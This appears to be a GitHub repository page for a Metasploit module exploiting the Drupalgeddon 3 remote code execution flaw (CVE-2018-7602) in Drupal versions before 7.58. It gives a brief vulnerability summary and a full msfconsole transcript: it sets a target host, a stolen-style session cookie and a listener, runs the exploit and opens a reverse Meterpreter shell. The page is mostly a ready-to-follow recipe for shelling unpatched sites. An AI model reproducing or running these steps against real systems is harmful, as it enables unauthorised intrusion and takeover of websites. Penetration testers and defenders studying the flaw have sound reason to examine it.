Skip to content

Drupal < 7.58 - Drupalgeddon 3 Authenticated Remote Code Execution (Metasploit)

Notifications You must be signed in to change notification settings

rithchard/Drupalgeddon3

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code Execution (Metasploit)

Author:

Metasploit Module for Drupalgeddon 3:

Original Exploit:

Drupal Afected Versions & Details:

Notes:

  • CVE-2018-7602 / SA-CORE-2018-004
  • A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution

Example Metasploit

Output Metasploit

six@ub:/opt/metasploit-framework$ ./msfconsole 
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v5.0.0-dev-8164379                   ]
+ -- --=[ 1758 exploits - 1006 auxiliary - 306 post       ]
+ -- --=[ 536 payloads - 41 encoders - 10 nops            ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

msf5 > use unix/webapp/drupal_drupalgeddon3
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set RHOST 192.168.1.200
RHOST => 192.168.1.200
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set DRUPAL_SESSION SESSad4467153480b84038526cd43a9ce852=AYyCoZ07NvaDObWxYYEfAOJKETi2atRdEU0B6yEBiRI
DRUPAL_SESSION => SESSad4467153480b84038526cd43a9ce852=AYyCoZ07NvaDObWxYYEfAOJKETi2atRdEU0B6yEBiRI
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set DRUPAL_NODE 3
DRUPAL_NODE => 3
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > set LHOST 192.168.1.200
LHOST => 192.168.1.200
msf5 exploit(unix/webapp/drupal_drupalgeddon3) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444 
[*] Token Form -> u73s2UzA1B056tdlItiAfpeolb5OVwLGEF5EAFH0bJY
[*] Token Form_build_id -> form-FtN_yMsgJI9GlviMbemIkYxgJ97xsUZ7Lg2hOtW1IlI
[*] Sending stage (37775 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.200:4444 -> 192.168.1.200:60156) at 2018-04-29 15:04:33 -0400

meterpreter > 

About

Drupal < 7.58 - Drupalgeddon 3 Authenticated Remote Code Execution (Metasploit)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages